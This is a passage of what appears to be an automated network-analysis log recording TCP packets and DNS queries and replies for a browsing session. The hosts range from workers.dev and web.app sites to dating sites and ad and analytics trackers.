                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.844945908 CEST4434978113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.845001936 CEST49795443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.845248938 CEST49795443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.845262051 CEST4434979513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.846473932 CEST4434978213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.846554041 CEST4434978213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.846607924 CEST49782443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.846641064 CEST49782443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.846643925 CEST4434978213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.846654892 CEST49782443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.846658945 CEST4434978213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.846961021 CEST49796443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.847023010 CEST4434979613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.847093105 CEST49796443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.847270012 CEST49796443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.847300053 CEST4434979613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.848581076 CEST49797443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.848651886 CEST4434979713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.848723888 CEST49797443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.848833084 CEST49797443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.848862886 CEST4434979713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.854923010 CEST4434978313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.855015039 CEST4434978313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.855062008 CEST49783443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.855118990 CEST49783443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.855127096 CEST4434978313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.855140924 CEST49783443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.855145931 CEST4434978313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:48.322659016 CEST192.168.2.61.1.1.10xc0c1Standard query (0)chattts-49f1.beszyrecala.workers.devA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:48.322810888 CEST192.168.2.61.1.1.10x7aa0Standard query (0)chattts-49f1.beszyrecala.workers.dev65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.523757935 CEST192.168.2.61.1.1.10x1d86Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.523885012 CEST192.168.2.61.1.1.10x7365Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.341464996 CEST192.168.2.61.1.1.10xc0a3Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.341778994 CEST192.168.2.61.1.1.10xcb8fStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.057858944 CEST192.168.2.61.1.1.10x4890Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.058104992 CEST192.168.2.61.1.1.10x900cStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.829699039 CEST192.168.2.61.1.1.10xdc9cStandard query (0)ruletridominium.web.appA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.830065966 CEST192.168.2.61.1.1.10x3913Standard query (0)ruletridominium.web.app65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.898478985 CEST192.168.2.61.1.1.10x146aStandard query (0)kengegame.web.appA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.898659945 CEST192.168.2.61.1.1.10x6b62Standard query (0)kengegame.web.app65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.938826084 CEST192.168.2.61.1.1.10x6659Standard query (0)uploads.codesandbox.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.939328909 CEST192.168.2.61.1.1.10x5e51Standard query (0)uploads.codesandbox.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.940933943 CEST192.168.2.61.1.1.10x83fbStandard query (0)starpng.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.941477060 CEST192.168.2.61.1.1.10x6f95Standard query (0)starpng.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.945252895 CEST192.168.2.61.1.1.10x8ca7Standard query (0)www.pinclipart.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.945728064 CEST192.168.2.61.1.1.10xb248Standard query (0)www.pinclipart.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:56.834768057 CEST192.168.2.61.1.1.10xdfa6Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:56.835031986 CEST192.168.2.61.1.1.10xb0daStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.378495932 CEST192.168.2.61.1.1.10xef5fStandard query (0)ruletridominium.web.appA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.378860950 CEST192.168.2.61.1.1.10xed5eStandard query (0)ruletridominium.web.app65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.382172108 CEST192.168.2.61.1.1.10x192cStandard query (0)uploads.codesandbox.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.382364035 CEST192.168.2.61.1.1.10x3ebbStandard query (0)uploads.codesandbox.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.387250900 CEST192.168.2.61.1.1.10xa25fStandard query (0)www.pinclipart.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.387530088 CEST192.168.2.61.1.1.10xddddStandard query (0)www.pinclipart.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.389420033 CEST192.168.2.61.1.1.10x67e8Standard query (0)starpng.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.389475107 CEST192.168.2.61.1.1.10x4bfeStandard query (0)starpng.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.048599958 CEST192.168.2.61.1.1.10x55a9Standard query (0)www.spark.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.049181938 CEST192.168.2.61.1.1.10x6b39Standard query (0)www.spark.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.068903923 CEST192.168.2.61.1.1.10xaa2cStandard query (0)www.spark.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.069299936 CEST192.168.2.61.1.1.10x5c17Standard query (0)www.spark.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.810398102 CEST192.168.2.61.1.1.10xc241Standard query (0)use.typekit.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.811021090 CEST192.168.2.61.1.1.10x6b04Standard query (0)use.typekit.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.812578917 CEST192.168.2.61.1.1.10x2bbaStandard query (0)assets.squarespace.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.813561916 CEST192.168.2.61.1.1.10x30ddStandard query (0)assets.squarespace.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.817594051 CEST192.168.2.61.1.1.10x7b6eStandard query (0)images.squarespace-cdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.818865061 CEST192.168.2.61.1.1.10x6db7Standard query (0)images.squarespace-cdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.845906019 CEST192.168.2.61.1.1.10xa1daStandard query (0)static1.squarespace.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:37.846455097 CEST192.168.2.61.1.1.10x653eStandard query (0)static1.squarespace.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:38.858824968 CEST192.168.2.61.1.1.10x2693Standard query (0)images.squarespace-cdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:38.859301090 CEST192.168.2.61.1.1.10xa5cfStandard query (0)images.squarespace-cdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:38.928347111 CEST192.168.2.61.1.1.10xa8adStandard query (0)assets.squarespace.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:38.928689957 CEST192.168.2.61.1.1.10x9437Standard query (0)assets.squarespace.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:39.010802984 CEST192.168.2.61.1.1.10xc56Standard query (0)use.typekit.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:39.011342049 CEST192.168.2.61.1.1.10x2167Standard query (0)use.typekit.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:41.808623075 CEST192.168.2.61.1.1.10x1dd0Standard query (0)static1.squarespace.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:41.809056997 CEST192.168.2.61.1.1.10xd6d6Standard query (0)static1.squarespace.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:44.330231905 CEST192.168.2.61.1.1.10xdbf3Standard query (0)www.spark.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:44.330372095 CEST192.168.2.61.1.1.10x3479Standard query (0)www.spark.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:44.795588017 CEST192.168.2.61.1.1.10xd5d8Standard query (0)p.typekit.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:44.798547983 CEST192.168.2.61.1.1.10x8707Standard query (0)p.typekit.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:47.446836948 CEST192.168.2.61.1.1.10xeab3Standard query (0)p.typekit.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:47.447518110 CEST192.168.2.61.1.1.10xdedaStandard query (0)p.typekit.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:47.557482958 CEST192.168.2.61.1.1.10x7666Standard query (0)performance.squarespace.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:47.558166027 CEST192.168.2.61.1.1.10x3dfbStandard query (0)performance.squarespace.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:56.982889891 CEST192.168.2.61.1.1.10xd433Standard query (0)about.christianmingle.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:56.983160973 CEST192.168.2.61.1.1.10xc6e7Standard query (0)about.christianmingle.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:57.766304970 CEST192.168.2.61.1.1.10xd23bStandard query (0)maps-api-ssl.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:42:57.766509056 CEST192.168.2.61.1.1.10x5810Standard query (0)maps-api-ssl.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:00.289273977 CEST192.168.2.61.1.1.10x53ebStandard query (0)about.christianmingle.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:00.289441109 CEST192.168.2.61.1.1.10xe9f5Standard query (0)about.christianmingle.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:00.494688988 CEST192.168.2.61.1.1.10x923Standard query (0)static.cloudflareinsights.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:00.494868994 CEST192.168.2.61.1.1.10xd1c7Standard query (0)static.cloudflareinsights.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:01.688600063 CEST192.168.2.61.1.1.10x26Standard query (0)static.cloudflareinsights.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:01.688946962 CEST192.168.2.61.1.1.10xc5d3Standard query (0)static.cloudflareinsights.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:01.757889032 CEST192.168.2.61.1.1.10xfd12Standard query (0)maps-api-ssl.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:01.758120060 CEST192.168.2.61.1.1.10x43c3Standard query (0)maps-api-ssl.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.392715931 CEST192.168.2.61.1.1.10x1d73Standard query (0)s.pinimg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.394335985 CEST192.168.2.61.1.1.10x4a3bStandard query (0)s.pinimg.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.396138906 CEST192.168.2.61.1.1.10xcf78Standard query (0)www.redditstatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.396343946 CEST192.168.2.61.1.1.10xb7d3Standard query (0)www.redditstatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.396877050 CEST192.168.2.61.1.1.10x840Standard query (0)cdn.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.397032976 CEST192.168.2.61.1.1.10x86d6Standard query (0)cdn.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.973845005 CEST192.168.2.61.1.1.10x6655Standard query (0)analytics.tiktok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.974226952 CEST192.168.2.61.1.1.10x20dcStandard query (0)analytics.tiktok.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.974925041 CEST192.168.2.61.1.1.10x3f27Standard query (0)s.pinimg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:02.975047112 CEST192.168.2.61.1.1.10x6aa6Standard query (0)s.pinimg.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.027663946 CEST192.168.2.61.1.1.10x2834Standard query (0)px.adentifi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.027884007 CEST192.168.2.61.1.1.10x4f37Standard query (0)px.adentifi.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.037470102 CEST192.168.2.61.1.1.10x6fbdStandard query (0)pixel-config.reddit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.040647984 CEST192.168.2.61.1.1.10xa5e1Standard query (0)pixel-config.reddit.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.087658882 CEST192.168.2.61.1.1.10xbfaeStandard query (0)www.redditstatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.087986946 CEST192.168.2.61.1.1.10x3ef5Standard query (0)www.redditstatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.228111029 CEST192.168.2.61.1.1.10x7b60Standard query (0)alb.reddit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.228387117 CEST192.168.2.61.1.1.10xb60dStandard query (0)alb.reddit.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.229665995 CEST192.168.2.61.1.1.10x5c89Standard query (0)psb.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.229804993 CEST192.168.2.61.1.1.10x4fd4Standard query (0)psb.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.288856983 CEST192.168.2.61.1.1.10x7cd5Standard query (0)cdn.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.289421082 CEST192.168.2.61.1.1.10x274bStandard query (0)cdn.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.214395046 CEST192.168.2.61.1.1.10x8669Standard query (0)trc.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.214903116 CEST192.168.2.61.1.1.10x2ccaStandard query (0)trc.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.223793983 CEST192.168.2.61.1.1.10xf6f2Standard query (0)ct.pinterest.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.224138975 CEST192.168.2.61.1.1.10xa66eStandard query (0)ct.pinterest.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.232120991 CEST192.168.2.61.1.1.10x9656Standard query (0)rtb.adentifi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.232656956 CEST192.168.2.61.1.1.10x2101Standard query (0)rtb.adentifi.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.236574888 CEST192.168.2.61.1.1.10x9870Standard query (0)w3-reporting-nel.reddit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.237107038 CEST192.168.2.61.1.1.10xb35Standard query (0)w3-reporting-nel.reddit.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.495663881 CEST192.168.2.61.1.1.10xb4fbStandard query (0)pixel-config.reddit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.496371031 CEST192.168.2.61.1.1.10x9c5fStandard query (0)pixel-config.reddit.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.526999950 CEST192.168.2.61.1.1.10xb196Standard query (0)analytics.tiktok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.527347088 CEST192.168.2.61.1.1.10xd5dbStandard query (0)analytics.tiktok.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.949992895 CEST192.168.2.61.1.1.10xcccfStandard query (0)psb.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.950381041 CEST192.168.2.61.1.1.10x201dStandard query (0)psb.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.956732988 CEST192.168.2.61.1.1.10xe78bStandard query (0)alb.reddit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.956892014 CEST192.168.2.61.1.1.10xe4ceStandard query (0)alb.reddit.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:05.223047972 CEST192.168.2.61.1.1.10x4f69Standard query (0)cdn.cookielaw.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:05.223439932 CEST192.168.2.61.1.1.10x5cbcStandard query (0)cdn.cookielaw.org65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:05.232518911 CEST192.168.2.61.1.1.10xc4b9Standard query (0)trc-events.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:05.232893944 CEST192.168.2.61.1.1.10xbe47Standard query (0)trc-events.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:05.244487047 CEST192.168.2.61.1.1.10x456cStandard query (0)cm.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:05.244945049 CEST192.168.2.61.1.1.10xa0adStandard query (0)cm.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:05.485407114 CEST192.168.2.61.1.1.10xf35fStandard query (0)ct.pinterest.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:05.485902071 CEST192.168.2.61.1.1.10xa820Standard query (0)ct.pinterest.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:05.499008894 CEST192.168.2.61.1.1.10x3b5fStandard query (0)trc.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:05.499490023 CEST192.168.2.61.1.1.10x9474Standard query (0)trc.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:05.994035959 CEST192.168.2.61.1.1.10x8512Standard query (0)cdn.cookielaw.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:05.994952917 CEST192.168.2.61.1.1.10xdc0dStandard query (0)cdn.cookielaw.org65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:06.895646095 CEST192.168.2.61.1.1.10x22e8Standard query (0)geolocation.onetrust.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:06.896425962 CEST192.168.2.61.1.1.10xc710Standard query (0)geolocation.onetrust.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:08.638303995 CEST192.168.2.61.1.1.10x3f9fStandard query (0)geolocation.onetrust.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:08.638933897 CEST192.168.2.61.1.1.10xe35aStandard query (0)geolocation.onetrust.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:09.789964914 CEST192.168.2.61.1.1.10xbfaeStandard query (0)ct.pinterest.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:09.790350914 CEST192.168.2.61.1.1.10x9028Standard query (0)ct.pinterest.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:48.335803032 CEST1.1.1.1192.168.2.60xc0c1No error (0)chattts-49f1.beszyrecala.workers.dev172.67.196.219A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:48.335803032 CEST1.1.1.1192.168.2.60xc0c1No error (0)chattts-49f1.beszyrecala.workers.dev104.21.60.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:48.340770006 CEST1.1.1.1192.168.2.60x7aa0No error (0)chattts-49f1.beszyrecala.workers.dev65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.530600071 CEST1.1.1.1192.168.2.60x1d86No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.530600071 CEST1.1.1.1192.168.2.60x1d86No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.530600071 CEST1.1.1.1192.168.2.60x1d86No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.530600071 CEST1.1.1.1192.168.2.60x1d86No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.348406076 CEST1.1.1.1192.168.2.60xc0a3No error (0)www.google.com172.217.18.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.348509073 CEST1.1.1.1192.168.2.60xcb8fNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.064639091 CEST1.1.1.1192.168.2.60x4890No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.064639091 CEST1.1.1.1192.168.2.60x4890No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.064639091 CEST1.1.1.1192.168.2.60x4890No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.064639091 CEST1.1.1.1192.168.2.60x4890No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.848795891 CEST1.1.1.1192.168.2.60xdc9cNo error (0)ruletridominium.web.app199.36.158.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.918948889 CEST1.1.1.1192.168.2.60x146aNo error (0)kengegame.web.app199.36.158.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.949471951 CEST1.1.1.1192.168.2.60x6659No error (0)uploads.codesandbox.io104.18.43.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.949471951 CEST1.1.1.1192.168.2.60x6659No error (0)uploads.codesandbox.io172.64.144.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.950021029 CEST1.1.1.1192.168.2.60x5e51No error (0)uploads.codesandbox.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.955487967 CEST1.1.1.1192.168.2.60x8ca7No error (0)www.pinclipart.com173.208.137.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.956754923 CEST1.1.1.1192.168.2.60x6f95No error (0)starpng.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.997697115 CEST1.1.1.1192.168.2.60x83fbNo error (0)starpng.com104.21.1.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.997697115 CEST1.1.1.1192.168.2.60x83fbNo error (0)starpng.com172.67.128.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:56.841773033 CEST1.1.1.1192.168.2.60xdfa6No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.391843081 CEST1.1.1.1192.168.2.60x3ebbNo error (0)uploads.codesandbox.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.391983986 CEST1.1.1.1192.168.2.60x192cNo error (0)uploads.codesandbox.io104.18.43.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:58.391983986 CEST1.1.1.1192.168.2.60x192cNo error (0)uploads.codesandbox.io172.64.144.247A (IP address)IN (0x0001)false
